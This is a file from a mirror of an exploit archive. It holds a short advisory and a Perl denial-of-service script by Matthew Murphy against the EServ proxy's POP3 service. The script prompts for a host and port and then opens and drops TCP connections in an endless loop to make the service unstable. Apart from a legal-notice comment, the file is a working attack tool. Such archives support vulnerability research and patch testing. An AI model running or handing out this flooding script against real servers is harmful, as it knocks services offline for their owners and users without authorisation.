exploit-db-mirror/exploits/windows/dos/22122.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

23 lines
No EOL
980 B
Perl
Executable file

source: https://www.securityfocus.com/bid/6520/info
EServ is a proxy software package distributed by EType. It is available for Microsoft Windows operating systems.
It has been reported that a problem in EServ may cause the software to crash. When a remote user sends a large amount of data via POP3, the software becomes unstable.
#!/usr/bin/perl
#LEGAL NOTICE: Don't test this on networks you don't administer,
#and do not test this tool on networks you don't own without
#permission of the network owner. You are responsible for all
#damage due to your use of this tool.
use IO::Socket;
print "$0: eServ Remote DoS Exploit\r\n";
print "By Matthew Murphy \<mattmurphy\@kc.rr.com\>\r\n\r\n";
print "Server hostname\: ";
$host = trim(chomp($line = <STDIN>));
print "Service port to probe\: ";
$port = trim(chomp($line = <STDIN>));
print "\r\nBeginning probe -- stop with CTRL+C\r\n";
while (1) {
$f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host:$port");
undef $f;
}